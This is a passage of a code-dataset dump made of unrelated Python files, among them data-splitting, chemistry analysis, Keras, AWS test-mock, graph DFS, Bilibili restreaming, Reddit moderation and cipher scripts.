train_val_split(data_path):\n \"\"\"\n Main function to split training data\n :param data_path: str\n :return: train dict and val dict containing images and labels file name\n \"\"\"\n data_path = Path(data_path)\n imgs = sorted(list(data_path.rglob(\"*.jpg\")))\n labels = sorted(list(data_path.rglob(\"*.xml\")))\n print(\"Images: %s\" % len(imgs))\n assert len(imgs) == len(labels)\n\n data = dict(zip(imgs, labels))\n keys = list(data.keys())\n random.shuffle(keys)\n data_shuffled = {}\n data_shuffled.update({k: data[k] for k in keys})\n\n train_dic = {}\n val_dic = {}\n threshold = int(len(imgs) * (1 - args.ratio))\n for i, (k, v) in enumerate(data_shuffled.items()):\n if i <= threshold:\n train_dic.update({k: v})\n else:\n val_dic.update({k: v})\n\n return train_dic, val_dic\n\n\ndef main():\n train_dic, val_dic = train_val_split(data_path=args.data_dir)\n dirs = _mk_dir(out_path=args.out_dir)\n\n for im, l in train_dic.items():\n shutil.copy(im, dirs[0].joinpath(im.parts[-1]))\n shutil.copy(l, dirs[1].joinpath(l.parts[-1]))\n for im, l in val_dic.items():\n shutil.copy(im, dirs[2].joinpath(im.parts[-1]))\n shutil.copy(l, dirs[3].joinpath(l.parts[-1]))\n\n print(\"Success: %s:\" % args.out_dir)\n print(\"Train %s:\" % len(train_dic))\n print(\"Validate %s:\" % len(val_dic))\n return None\n\n\nif __name__ == \"__main__\":\n args = args_parser()\n random.seed(args.seed)\n main()\n","sub_path":"tools/train_val_split.py","file_name":"train_val_split.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"551548334","text":"#!/usr/bin/env python\n\nfrom MRChem import MrchemOut\nimport glob\nimport sys\nimport pandas as pd\n\n# Get all relevant output files in a list\nfiles = glob.glob(\"*_*_*_*.out\")\nerror_files = filter(lambda f: not MrchemOut(f).normaltermination(), files)\n# Get rid of extension\nfilenames = map(lambda x: x.split(\".\")[0], files)\n\n#Test if all jobs terminated normally\nassert len(error_files) == 0, \"Error! These {} job(s) did not terminate normally: {}\".format(len(error_files), ' '.join([MrchemOut(f).filename for f in files if not MrchemOut(f).normaltermination()]))\n\nprint(\"All jobs terminated normally\")\n\n# now we construct the dict and fill with information from filenames\n# this dict will contain the raw data for each calculation\nrawdata = {}\nrawdata[\"molecule\"] = [f.split(\"_\")[0] for f in filenames]\nrawdata[\"functional\"] = [f.split(\"_\")[1] for f in filenames]\nrawdata[\"field\"] = [f.split(\"_\")[3] for f in filenames]\nrawdata[\"direction\"] = [f.split(\"_\")[4] for f in filenames]\nrawdata[\"energy\"] = []\nrawdata[\"dipole\"] = []\nrawdata[\"filename\"] = []\nrawdata[\"precision\"] = []\n\n# now collect the energies, dipoles, filenames, and precisions from output \n# and add them to the dict\nfor f in files:\n output = MrchemOut(f)\n rawdata[\"energy\"].append(output.final_energy_pot())\n rawdata[\"dipole\"].append(output.dipole_vector())\n rawdata[\"filename\"].append(output.filename)\n rawdata[\"precision\"].append(output.precision())\n \n# now write raw data to CSV file using a useful pandas command\npd.DataFrame(rawdata).to_csv(\"rawdata.csv\")\n\n\n# We will need a function that converts a string into a float. Example: \"00025\" -> 0.0025\ndef decimal(s):\n return s[0:1] + \".\" + s[1:]\n\n# now collect the jobs on same molecule with same functional at same precision, but with fields of opposite signs\n# appending filenames and absolute value of field strength\ntriplet = []\nfor f in filter(lambda f: f.split(\"_\")[3] == \"-001\", files):\n for g in filter(lambda f: f.split(\"_\")[3] == \"+001\", files):\n if f.split(\"_\")[0] == g.split(\"_\")[0] and f.split(\"_\")[1] == g.split(\"_\")[1] and f.split(\"_\")[2] == g.split(\"_\")[2] and f.split(\"_\")[4] == g.split(\"_\")[4]:\n triplet.append([f, g, decimal(f.split(\"_\")[3][1:])])\n\nfor i, trip in enumerate([el for trip in triplet for el in trip if \"+\" in el]):\n triplet[i].append(trip.split(\"_\")[0])\n triplet[i].append(trip.split(\"_\")[1])\n triplet[i].append(str(MrchemOut(trip).precision()))\n triplet[i].append(trip.split(\"_\")[4].split(\".\")[0])\n\n# first unzip the sorted list (the order has been triple checked)\nminus, plus, field, mol, func, prec, direction = (zip(*sorted(triplet)))\n\n# then map the energy/diple moment to the list, and convert to string\n#plus = map(str, map(lambda f: MrchemOut(f).dipole_au(), plus))\n#minus = map(str, map(lambda f: MrchemOut(f).dipole_au(), minus))\n\n# First comvert tuple to list\nplus = [x for x in plus]\nminus = [x for x in minus]\n\n# Now replace filename with the correct dipole component\nfor i, f in enumerate(plus):\n if \"x\" in f:\n plus[i] = str(MrchemOut(f).dipole_vector()[0])\n elif \"y\" in f:\n plus[i] = str(MrchemOut(f).dipole_vector()[1])\n elif \"z\" in f:\n plus[i] = str(MrchemOut(f).dipole_vector()[2])\nfor i, f in enumerate(minus):\n if \"x\" in f:\n minus[i] = str(MrchemOut(f).dipole_vector()[0])\n elif \"y\" in f:\n minus[i] = str(MrchemOut(f).dipole_vector()[1])\n elif \"z\" in f:\n minus[i] = str(MrchemOut(f).dipole_vector()[2])\n\n# then zip back\ntriplet = zip(mol, func, prec, field, direction, plus, minus)\n\n# now insert header\ntriplet.insert(0, (\"molecule\", \"functional\", \"precision\", \"field_strength\", \"direction\", \"u+\", \"u-\"))\n\n# finally print to terminal in a format easily copied to Excel\nfor i in triplet:\n print(' '.join(i))\n\n\n\n","sub_path":"mrchem_pol_analysis.py","file_name":"mrchem_pol_analysis.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"167472375","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, SimpleRNN\n\n#1. data\nx = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6]])\ny = np.array([4,5,6,7])\n\nprint(x.shape, y.shape) # (4, 3) (4,)\n\nx = x.reshape(4, 3, 1) # (bacth_size, timesteps, feature) \n\n#2. model\nmodel = Sequential()\nmodel.add(SimpleRNN(units=10, activation='relu', input_shape=(3,1))) # units = output, 행무시이기때문에 (3,1)\nmodel.add(SimpleRNN(10, activation='relu', input_length=3, input_dim=1))\n # timesteps feature\nmodel.add(Dense(9, activation='relu'))\nmodel.add(Dense(1))\n\nmodel.summary()\n\n\n#3. compile, fit\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(x, y, epochs=1000, batch_size=1)\n\n#4. evaluate, predict\nx_input = np.array([5,6,7]).reshape(1,3,1)\nresults = model.predict(x_input)\nprint(results) \n\n\n# epochs=1000 : [[8.009891]]\n","sub_path":"keras/keras34_RNN2.py","file_name":"keras34_RNN2.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"42850720","text":"# Copyright 2017 Bracket Computing, Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# https://github.com/brkt/brkt-cli/blob/master/LICENSE\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport brkt_cli\nfrom brkt_cli.aws import share_logs, boto3_device\nfrom brkt_cli.aws.model import Instance, Snapshot\n\n\nclass EC2():\n\n def Instance(self, instance_id):\n instance = Instance()\n instance.id = instance_id\n instance.public_dns_name = 'test-name'\n instance.state = 'running'\n return instance\n\n\nclass EC2Client():\n\n def delete_key_pair(self, KeyName):\n return\n\n def create_key_pair(self, KeyName):\n return {'KeyMaterial': 123}\n\n def run_instances(self, ImageId, MinCount, MaxCount, InstanceType,\n BlockDeviceMappings, UserData, EbsOptimized,\n SubnetId, KeyName):\n instance = {'Instances': [{'InstanceId': 'test-id'}]}\n\n return instance\n\n\n# This class is used for testing ShareLogs\nclass ShareLogsTestService(share_logs.ShareLogsService):\n\n def __init__(self):\n self.ec2client = EC2Client()\n self.ec2 = EC2()\n\n def get_instance(self, instance_id):\n instance = Instance()\n instance.state['Name'] = 'running'\n instance.root_device_name = '/dev/sda1'\n instance.id = 'test-id'\n\n dev = boto3_device.make_device(\n device_name='/dev/sda1',\n volume_id='vol-1'\n )\n instance.block_device_mappings = [dev]\n return instance\n\n def create_snapshot(self, volume_id, name):\n snapshot = Snapshot()\n snapshot.id = 'test-id'\n snapshot.volume_size = '5'\n return snapshot\n\n def get_snapshots(self, snapshot_id):\n snapshot = Snapshot()\n snapshot.state = 'completed'\n return [snapshot]\n\n def get_snapshot(self, snapshot_id):\n snapshot = Snapshot()\n snapshot.state = 'completed'\n return snapshot\n\n def wait_file(self, ip, logs_file, dest, key, path,\n bast_key=None, bast_user=None, bast_ip=None):\n return\n\n\nclass TestShareLogs(unittest.TestCase):\n\n def setUp(self):\n brkt_cli.util.SLEEP_ENABLED = False\n\n def test_with_instance_id(self):\n aws_svc = ShareLogsTestService()\n logs_svc = ShareLogsTestService()\n instance_id = 'test-instance'\n snapshot_id = None\n region = 'us-west-2'\n destination = \"./logs.tar.gz\"\n\n share_logs.share(aws_svc, logs_svc, instance_id=instance_id,\n snapshot_id=snapshot_id, region=region, dest=destination,\n subnet_id=None, bast_key=None, bast_user=None, bast_ip=None)\n\n def test_with_snapshot_id(self):\n aws_svc = ShareLogsTestService()\n logs_svc = ShareLogsTestService()\n instance_id = None\n snapshot_id = 'test-snapshot'\n region = 'us-west-2'\n destination = \"./logs.tar.gz\"\n\n share_logs.share(aws_svc, logs_svc, instance_id=instance_id,\n snapshot_id=snapshot_id, region=region, dest=destination,\n subnet_id=None, bast_key=None, bast_user=None, bast_ip=None)\n","sub_path":"brkt_cli/aws/test_share_logs.py","file_name":"test_share_logs.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"421073192","text":"'''\nGiven an array A of non-negative integers, \nreturn the maximum sum of elements in two non-overlapping (contiguous) subarrays, which have lengths L and M. \n(For clarification, the L-length subarray could occur before or after the M-length subarray.)\nFormally, return the largest V for which V = (A[i] + A[i+1] + ... + A[i+L-1]) + (A[j] + A[j+1] + ... + A[j+M-1]) and either:\n0 <= i < i + L - 1 < j < j + M - 1 < A.length, or\n0 <= j < j + M - 1 < i < i + L - 1 < A.length.\n \nExample 1:\nInput: A = [0,6,5,2,2,5,1,9,4], L = 1, M = 2\nOutput: 20\nExplanation: One choice of subarrays is [9] with length 1, and [6,5] with length 2.\n\nExample 2:\nInput: A = [3,8,1,3,2,1,8,9,0], L = 3, M = 2\nOutput: 29\nExplanation: One choice of subarrays is [3,8,1] with length 3, and [8,9] with length 2.\n\nExample 3:\nInput: A = [2,1,5,6,0,9,5,0,3,8], L = 4, M = 3\nOutput: 31\nExplanation: One choice of subarrays is [5,6,0,9] with length 4, and [3,8] with length 3.\n \nNote:\nL >= 1\nM >= 1\nL + M <= A.length <= 1000\n0 <= A[i] <= 1000\n'''\n\nclass Solution:\n def maxSumTwoNoOverlap(self, A: List[int], L: int, M: int) -> int:\n for i in range(1, len(A)):\n A[i] += A[i-1]\n ans = A[L+M-1];\n Lmax=A[L-1] # running max of L sequence\n Mmax=A[M-1] # running max of M sequence\n for i in range(L+M, len(A)):\n Lmax = max(Lmax, A[i-M]-A[i-L-M])\n Mmax = max(Mmax, A[i-L]-A[i-L-M])\n ans=max(ans, Lmax+A[i]-A[i-M])\n ans=max(ans, Mmax+A[i]-A[i-L])\n return ans\n \n#solution 2\nclass Solution:\n def maxSumTwoNoOverlap(self, A: List[int], L: int, M: int) -> int:\n def solve(l,m):\n left = p = sum(A[:l]) \n c = sum(A[l:l+m])\n ans = left + c\n for i in range(l, len(A) - m):\n p += A[i] - A[i-l]\n c += A[i+m] - A[i]\n left = max(left, p)\n ans = max(c + left, ans) \n return ans \n return max(solve(L,M), solve(M, L))\n \n","sub_path":"Python/1031. Maximum Sum of Two Non-Overlapping Subarrays.py","file_name":"1031. Maximum Sum of Two Non-Overlapping Subarrays.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"123071265","text":"'''\r\nModule: Plotter\r\nPurpose: This module is to plot and display values onto a graphical console window\r\n\r\nCreated on Oct 21, 2017\r\n@author: Joey S. Amalei\r\n\r\nCS431-01\r\nFall 2017\r\n'''\r\n\r\n\"\"\"\r\nImport PyPlot Package from Python to graph\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\"\"\"\r\nDefine Functions to use for Plotter Module\r\n\"\"\"\r\ndef setGraphLabels(graphTitle, xLabel, yLabel):\r\n \"\"\"\r\n Assign lables on the graphical window\r\n figsize is shown using inches for graphical window size\r\n \"\"\"\r\n plt.figure(figsize=(10, 5))\r\n plt.title(graphTitle)\r\n plt.xlabel(xLabel)\r\n plt.ylabel(yLabel)\r\n\r\ndef drawGraph(rawData, linearRegressionData, numOfMonths): \r\n \"\"\"\r\n Fill values to the x list to be used as our X-Axis tick mark labels\r\n \"\"\"\r\n x = []\r\n for i in range (numOfMonths):\r\n x.append(i)\r\n \r\n \"\"\"\r\n Plot x and y values onto graph\r\n \"\"\"\r\n # Graph function for rawData values\r\n # Argument c - changes the color of the scatter dot graph\r\n plt.scatter(x, rawData, c=\"r\")\r\n # Graph function for linearRegressionData values\r\n # Argument c - changes the color of the line graph\r\n plt.plot(x, linearRegressionData, c=\"b\")\r\n \r\n \"\"\"\r\n Graph and display graphical values onto console window\r\n \"\"\"\r\n plt.show()","sub_path":"Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"543968477","text":"from collections import defaultdict\n\nclass Graph:\n def __init__(self):\n self.graph = dict()\n\n def add(self,u,v):\n if u in self.graph:\n self.graph[u].append(v)\n else:\n self.graph[u] = [v]\n\n\ndef dfs(g, k,clr, fvst, lvst,edg, dfsl):\n #global clr, fvst, lvst, t, edg, dfsl\n dfsl.append(k)\n dfs.t += 1\n fvst[k] = dfs.t\n clr[k] = 'g'\n\n if k in g:\n for av in g[k]:\n if clr[av] == 'w':\n\n dfs(g, av, clr, fvst, lvst, edg, dfsl)\n elif clr[av] == 'g':\n edg['bck'].append((k, av))\n elif clr[av] == 'b':\n edg['crs'].append((k, av))\n\n clr[k] = 'b'\n dfs.t += 1\n lvst[k] = dfs.t\n\n\n\ndef Dfs(g):\n #global clr, fvst, lvst, t\n clr = {}\n fvst = {}\n lvst = {}\n dfs.t = 0\n dfsl = []\n edg = {'bck': [], 'crs': []}\n\n for v, adjv in g.items():\n clr[v] = 'w'\n fvst[v] = 0\n lvst[v] = 0\n for av in adjv:\n clr[av] = 'w'\n fvst[av] = 0\n lvst[av] = 0\n for cn in g:\n if clr[cn] == 'w':\n dfs(g, cn,clr,fvst,lvst,edg,dfsl)\n\n for k, v in edg.items():\n print(k, v)\n\n for v in dfsl:\n print('vrtx', v, 'first vst-->', fvst[v], 'last vst-->', lvst[v])\n\n if len(edg['bck'])>=1:\n return True\n else:\n return False\n\n\n\n\n\nif __name__ == '__main__':\n T = int(input())\n\n for _ in range(T):\n g = Graph()\n\n V, E = [int(x) for x in input().split()]\n\n for i in range(E):\n u,v=[int(x) for x in input().split()]\n g.add(u,v)\n\n Dfs(g.graph)\n\n\n\n'''\ni/p-: input to be copy and paste to console prompt\n2\n6 8\n1 2\n1 4\n2 3\n3 4\n4 2\n5 3\n5 6\n6 6\n8 12\n1 2\n1 3\n1 6\n2 5\n3 4\n4 1\n4 8\n5 6\n5 7\n5 8\n6 2\n6 7\n\n####################################\ntest_cases 1, detail clrs book\n\nfigure 22.4\ninput\n6 8\n1 2\n1 4\n2 3\n3 4\n4 2\n5 3\n5 6\n6 6\n\noutput\nbck [(4, 2), (6, 6)]\ncrs [(1, 4), (5, 3)]\nvrtx 1 first vst--> 1 last vst--> 8\nvrtx 2 first vst--> 2 last vst--> 7\nvrtx 3 first vst--> 3 last vst--> 6\nvrtx 4 first vst--> 4 last vst--> 5\nvrtx 5 first vst--> 9 last vst--> 12\nvrtx 6 first vst--> 10 last vst--> 11\n\n\n##################\ntcs 2\n\ninput\n8 12\n1 2\n1 3\n1 6\n2 5\n3 4\n4 1\n4 8\n5 6\n5 7\n5 8\n6 2\n6 7\n\noutput\nbck [(6, 2), (4, 1)]\ncrs [(5, 7), (4, 8), (1, 6)]\nvrtx 1 first vst--> 1 last vst--> 16\nvrtx 2 first vst--> 2 last vst--> 11\nvrtx 5 first vst--> 3 last vst--> 10\nvrtx 6 first vst--> 4 last vst--> 7\nvrtx 7 first vst--> 5 last vst--> 6\nvrtx 8 first vst--> 8 last vst--> 9\nvrtx 3 first vst--> 12 last vst--> 15\nvrtx 4 first vst--> 13 last vst--> 14\n'''","sub_path":"graph/edge type back,cross.py","file_name":"edge type back,cross.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"502062780","text":"import Main\nfrom Player import Player\n\n# backpack issue\n\nclass Main:\n def __init__(self):\n print(\"init\")\n\n # random data\n\n\n print(self.playerList)\n\n def get_data(self):\n player1 = Player(1, 'yaochen', 8, 7);\n player2 = Player(2, 'xiaolin', 9, 5);\n player3 = Player(3, 'haoyang', 6, 7);\n player4 = Player(4, 'jiahao', 7, 8);\n player5 = Player(5, 'chengkun', 11, 10);\n player6 = Player(6, 'ziye', 7, 11);\n self.playerList = [player1, player2, player3, player4, player5, player6];\n\n def process(self):\n print(\"process\")\n\n\nif __name__ == \"__main__\":\n main = Main()\n main.process()\n\n# https://www.cnblogs.com/William-xh/p/7305877.html","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466727184","text":"from bilibiliProxy import BilibiliProxy\nfrom subprocessOp import _forwardStream_sync, _getYotube_m3u8_sync\nimport utitls\nimport time\nimport traceback\nimport os\nimport signal\n\nimport questInfo\n\ndef bilibiliStartLive(channelId, room_title, area_id=None):\n curSub = utitls.getSubInfoWithSubChannelId(channelId)\n curBiliAccCookie = curSub['bilibili_cookiesStr']\n\n tmp_area_id = area_id\n if tmp_area_id == None:\n tmp_area_id = curSub['bilibili_areaid']\n\n b = BilibiliProxy(curBiliAccCookie)\n t_room_id = b.getLiveRoomId()\n # b.stopLive(t_room_id) #Just don't care the Live status, JUST STARTLIVE\n\n b.updateRoomTitle(t_room_id, room_title)\n rtmp_link = b.startLive(t_room_id, tmp_area_id)\n if curSub['auto_send_dynamic'] and rtmp_link and questInfo._getObjWithRTMPLink(rtmp_link) is None:\n if curSub['dynamic_template']:\n b.send_dynamic(curSub['dynamic_template']).replace('${roomUrl}', 'https://live.bilibili.com/' + t_room_id)\n else:\n b.send_dynamic('转播开始了哦~')\n return b, t_room_id, rtmp_link\n\n\ndef Async_forwardToBilibili(channelId, link, room_title='Testing Title', area_id=None, isSubscribeQuest=True):\n utitls.runFuncAsyncThread(_forwardToBilibili_Sync, (channelId, link, room_title, area_id, isSubscribeQuest))\ndef _forwardToBilibili_Sync(channelId, link, room_title, area_id=None, isSubscribeQuest=True):\n resloveURLOK = False\n tmp_retryTime = 10\n while tmp_retryTime > 0:\n if 'youtube.com/' in link or 'youtu.be/' in link:\n m3u8Link, err, errcode = _getYotube_m3u8_sync(link)\n if errcode == 0:\n link = m3u8Link\n resloveURLOK = True\n break\n else:\n tmp_retryTime -= 1\n time.sleep(60)\n else:\n utitls.myLogger('_forwardToBilibili_Sync LOG: Unsupport ForwardLink:' + link)\n return\n\n if resloveURLOK:\n b, t_room_id, rtmp_link = bilibiliStartLive(channelId, room_title, area_id)\n if rtmp_link:\n tmp_quest = questInfo._getObjWithRTMPLink(rtmp_link)\n if tmp_quest != None:\n try:\n os.kill(tmp_quest.get('pid', None), signal.SIGKILL)\n except Exception:\n utitls.myLogger(traceback.format_exc())\n questInfo.removeQuest(rtmp_link)\n # force stream\n _forwardStream_sync(link, rtmp_link, isSubscribeQuest)\n","sub_path":"AutoOperate.py","file_name":"AutoOperate.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"50281114","text":"N = int(input())\nmemo = []\n\ndef init_memo():\n memo.append(-1)\n memo.append(0)\n memo.append(1)\n memo.append(1)\n\ndef record():\n for i in range(4, N + 1):\n value = 10000000001\n\n if(i % 3 == 0):\n value = min(memo[i - 1], memo[i // 3])\n\n if(i % 2 == 0):\n value = min(value, memo[i // 2])\n\n value = min(memo[i - 1], value)\n\n value += 1\n memo.append(value)\n\ndef extra():\n if(N == 1):\n print(memo[1])\n return False\n\n if(N == 2):\n print(memo[2])\n return False\n\n if(N == 3):\n print(memo[3])\n return False\n\n return True\n\ndef print_result():\n print(memo.pop())\n\ndef main():\n init_memo()\n\n if(extra()):\n record()\n print_result()\n \n return\n \n \n \nif(__name__ == \"__main__\"):\n main()\n ","sub_path":"by date/2021.01.25/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456540295","text":"import praw\nimport pprint\nimport re\n\n#take string and search for presence of numeral(s). returns match object\ndef checkForNumeral(post):\n return re.search('\\d')\n\n#searches and deletes all non-whitespace special characters\ndef formatPost(post):\n formatted = re.sub('[^A-Za-z0-9\\s]+', '', post)\n return formatted\n\n#searches for phone number. returns match object\ndef findNumber(newPost):\n #is this better?: '\\d{3}\\s?\\d{3}\\s?\\d{4}'\n #this seems a little cleaner since we no longer have\n #to worry about special characters\n pattern = re.compile('^\\(?([0-9]{3})\\)?[-.]?([0-9]{3})[-.]?([0-9]{4})$')\n numberFound = pattern.search(newPost)\n return numberFound\n\n#deletes submission or comment\ndef removePost(item):\n item.delete()\n\n\ndef main():\n reddit = praw.Reddit(client_id='',\n client_secret='',\n password='',\n user_agent='testscript.v1.0./u/freenet420',\n username='')\n subreddit = reddit.subreddit('ZenDen').new(limit=100)\n\n\n for submission in subreddit:\n\n newPost = formatPost(submission.selftext)\n\n #I need some help getting these if statments out of main()\n if checkForNumeral():\n numberFound = findNumber(newPost)\n\n if numberFound:\n removePost(submission)\n\n\n #try to keep a stament like if or while or anything\n #outside of this loop\n #think of this like the main that runs little parts\n #of the program.\n\n #you may find that you have to use it with the way you\n #are thinknig of doing and if thats so, go for it.\n\nmain()\n\n\n#Ideas:\n#Use an if that checks posts for numbers in the first place that way\n#we dont go over anything that doesnt have a number in itself.\n\n#Locial Flow:\n#main, formatPost, checkForNumber, findNumber, removeNumber\n\n#Alternate Logical Flow (if there is no number in post don't format)\n#main, checkForNumber, formatPost, findNumber, removeNumber\n","sub_path":"PhoneFinder.py","file_name":"PhoneFinder.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"188777811","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n @Time : 2020/06/21\n @Auth : 晨光\n @File : selenium基础操作.py\n @IDE : PyCharm\n @Email: 624011110@qq.com\n-------------------------------------------------\n\"\"\"\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\n\nurl = 'http://www.baidu.com'\n\n# 隐式等待 20m\ndriver.implicitly_wait(20)\n\n# 1, 打开网页\ndriver.get(url)\n\n# 2 , 窗口最大化\ndriver.maximize_window()\n\n# 3, 窗口最小化\ndriver.minimize_window()\n\n# 4, 前进\ndriver.forward()\n\n# 5, 后退\ndriver.back()\n\n# 6, 刷新\ndriver.refresh()\n\n# 7, 退出浏览器\ndriver.quit()\n\n# 8, 关闭标签页\ndriver.close()","sub_path":"WebClass/web_05_元素定位/selenium基础操作.py","file_name":"selenium基础操作.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"305941607","text":"def findWinners():\r\n fac = int(input(\"Enter factor digit: \"))\r\n must = int(input(\"Enter must-have digit: \"))\r\n n = int(input(\"Enter the number of participants: \"))\r\n\r\n count = 0\r\n\r\n for i in range(1,n+1):\r\n if ((i % fac == 0) and contains(must, i)):\r\n count += 1\r\n print(i)\r\n print(\"Total number of winners: \", count)\r\n\r\n# this boolean function checks if the number 'num'\r\n# contains the digit 'digit'\r\ndef contains(digit, num):\r\n while num > 0:\r\n if (num % 10 == digit):\r\n return True\r\n else:\r\n num = num // 10\r\n return False\r\n\r\nfindWinners()\r\n","sub_path":"random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"473545861","text":"\r\n\r\ndef readKey(filepath):\r\n key_dict = {}\r\n with open(filepath, 'r') as f:\r\n for line in f:\r\n items = line.split()\r\n # print(items)\r\n key, values = items[0], items[1]\r\n key_dict[key] = values\r\n return key_dict\r\n \r\nkey = readKey('E:\\Sai\\key.txt')\r\n\r\n\r\n# def encode(key, message, text):\r\n # my_dict = key\r\n # cipher, final_text = \"\", \"\"\r\n # message = list(message.upper())\r\n # if (5*len(message)) > len(text):\r\n # print('abc')\r\n # text = text * int((len(text) / len(message) + 1) \r\n # elif (len(text) >= 5*len(message)):\r\n # text = text \r\n # print('def')\r\n # # part 1 of the encoding : converting to the binary code\r\n # for letter in message:\r\n # if(letter != ' '):\r\n # cipher += my_dict[letter]\r\n # else:\r\n # cipher += ' '\r\n # # part 2 of encoding : converting binary code to string of letters \r\n # if text == text:\r\n # i = 0\r\n # new_text = text.replace(' ', '').lower()\r\n # # print(new_text)\r\n # for i in range(0,len(new_text),5):\r\n # substr_text = list(new_text[i:i + 5])\r\n # substr_cip = list(cipher[i:i + 5])\r\n # if 'b' in substr_cip:\r\n # for i in range(0,len(substr_cip)):\r\n # if substr_cip[i] == 'b':\r\n # substr_text[i] = substr_text[i].upper()\r\n \r\n # else:\r\n # pass\r\n # final_text += ''.join(substr_text)\r\n \r\n # elif text == None:\r\n # i = 0\r\n # new_text = ''.join(random.choices(string.ascii_lowercase, k=len(message)*5))\r\n # # print(new_text)\r\n # for i in range(0,len(new_text),5):\r\n # substr_text = list(new_text[i:i + 5])\r\n # substr_cip = list(cipher[i:i + 5])\r\n # if 'b' in substr_cip:\r\n # for i in range(0,len(substr_cip)):\r\n # if substr_cip[i] == 'b':\r\n # substr_text[i] = substr_text[i].upper()\r\n \r\n # else:\r\n # pass\r\n # final_text += ''.join(substr_text)\r\n \r\n # return str(final_text) \r\n \r\n# print(encode(key, 'ALICE', 'ora et labora'))\r\n\r\n\r\ndef decode(key, text): \r\n decipher, final = '' , ''\r\n text = text\r\n my_dict = key\r\n # print(my_dict.keys())\r\n # print(my_dict.values())\r\n substr_cip = ['a'] * len(text)\r\n # print(substr_cip)\r\n # part 1 of decoding \r\n for i in range (0, len(text),5):\r\n substr_text = list(text[i:i + 5]) \r\n # print(substr_text)\r\n for j in range (0, len(substr_text)):\r\n if substr_text[j].isupper() == True:\r\n substr_cip[j] = 'b'\r\n print(substr_cip) \r\n else:\r\n pass\r\n \r\n final += ''.join(substr_cip)\r\n print('final:',final)\r\n for k in range (0, len(final),5):\r\n substr = final[k:k + 5] \r\n for key, value in my_dict.items():\r\n if substr == value:\r\n decipher += my_dict[value]\r\n \r\n print('decipher:',decipher) \r\n \r\n return decipher \r\n\r\nprint(decode(key, 'dracodOrMIeNsnumquAmtiTil'))","sub_path":"read_test.py","file_name":"read_test.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"279535569","text":"#!/usr/bin/env python\n#--coding:utf-8 --\n\"\"\"\ncallDiffLoops.py\nCalling differentially enriched loops between different cells/conditions or similar situation. \nWell tested for Trac-looping data. \n2020-03-10: add MA and voccano plot.\n2020-05-04: MANorm2 normalization added.\n2020-05-05: refined a lot with the base of MANorm\n2020-05-06: updated auto-estimation of MA Mcut and Acut\n2020-05-10: fitting values changed to counts , if using interaction per kb, there will be outlieers in MA plot. The cutoffs of M and A is determine in background, while there is systematic difference between bg and fg, a ftting again is needed.\n2020-05-20: try to add the shift of background to foreground, too strigenet\n2020-06-24: try to add the estimation of anchors\n2020-07-30: try to add the estimation of anchors, and seperated loops. acut and mcut estimated from background already very strong. win size may not affect, so for efficient consideration set to 1. Alsoadd p-values to bg estimation.\n2021-04-12: cutomize parameters for acut and mcut for MA plot added\n2021-05-10: add heatmap vmin/vmax, cmap; not p-value cutoff added to include more loops.\n2021-08-20: add 1D peak normalization option.\n\"\"\"\n\n__date__ = \"\"\n__modified__ = \"\"\n__email__ = \"caoyaqiang0410@gmail.com\"\n\n#sys\nimport os\nimport sys\nimport json\nfrom glob import glob\nfrom copy import deepcopy\nfrom datetime import datetime\n\n#3rd\nimport joblib\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom scipy.stats import poisson\nfrom sklearn import linear_model\nfrom joblib import Parallel, delayed\nfrom sklearn.mixture import GaussianMixture as GMM\n\n#cLoops\nfrom cLoops2.io import parseTxt2Loops, ixy2pet, dloops2txt, dloops2juiceTxt, loops2washuTxt, dloops2NewWashuTxt\nfrom cLoops2.ds import Loop, XY, DiffLoop\nfrom cLoops2.agg import getALoops\nfrom cLoops2.geo import checkLoopOverlap\nfrom cLoops2.est import estSfMANorm\nfrom cLoops2.settings import 